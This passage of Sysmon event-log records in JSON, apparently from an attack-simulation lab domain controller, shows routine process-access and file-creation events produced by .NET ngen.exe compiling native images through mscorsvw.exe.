C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:59.215","SourceProcessGUID":"{A837DB8D-040F-5F25-0000-0010414F0B00}","SourceProcessId":"2732","SourceThreadId":"2496","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-051B-5F25-0000-001061461300}","TargetProcessId":"2776","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","EventReceivedTime":"2020-08-01 06:01:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:59","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8216,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:59.215\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-051B-5F25-0000-001061461300}\r\nTargetProcessId: 2776\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:59.215","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-051B-5F25-0000-001061461300}","TargetProcessId":"2776","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:01:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:59","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8217,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:59.231\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-051B-5F25-0000-001061461300}\r\nTargetProcessId: 2776\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:59.231","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-051B-5F25-0000-001061461300}","TargetProcessId":"2776","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:01:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:59","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8218,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:59.262\r\nSourceProcessGUID: {A837DB8D-040F-5F25-0000-0010414F0B00}\r\nSourceProcessId: 2732\r\nSourceThreadId: 3272\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-051B-5F25-0000-00106C491300}\r\nTargetProcessId: 3112\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:59.262","SourceProcessGUID":"{A837DB8D-040F-5F25-0000-0010414F0B00}","SourceProcessId":"2732","SourceThreadId":"3272","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-051B-5F25-0000-00106C491300}","TargetProcessId":"3112","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:01:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:59","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8219,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:59.262\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-051B-5F25-0000-00106C491300}\r\nTargetProcessId: 3112\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:59.262","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-051B-5F25-0000-00106C491300}","TargetProcessId":"3112","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:01:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:59","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8220,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:59.262\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-051B-5F25-0000-00106C491300}\r\nTargetProcessId: 3112\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:59.262","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-051B-5F25-0000-00106C491300}","TargetProcessId":"3112","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:01:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:59","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8221,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:00:59.309\r\nProcessGuid: {A837DB8D-051B-5F25-0000-00106C491300}\r\nProcessId: 3112\r\nImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\c28-0\\Accessibility.dll\r\nCreationUtcTime: 2020-08-01 06:00:59.309","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:00:59.309","ProcessGuid":"{A837DB8D-051B-5F25-0000-00106C491300}","Image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\c28-0\\Accessibility.dll","CreationUtcTime":"2020-08-01 06:00:59.309","EventReceivedTime":"2020-08-01 06:01:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:59","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8222,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:59.340\r\nSourceProcessGUID: {A837DB8D-040F-5F25-0000-0010414F0B00}\r\nSourceProcessId: 2732\r\nSourceThreadId: 2496\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-051B-5F25-0000-0010BA4C1300}\r\nTargetProcessId: 3792\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:59.340","SourceProcessGUID":"{A837DB8D-040F-5F25-0000-0010414F0B00}","SourceProcessId":"2732","SourceThreadId":"2496","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-051B-5F25-0000-0010BA4C1300}","TargetProcessId":"3792","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","EventReceivedTime":"2020-08-01 06:01:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:59","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8223,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:59.340\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-051B-5F25-0000-0010BA4C1300}\r\nTargetProcessId: 3792\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 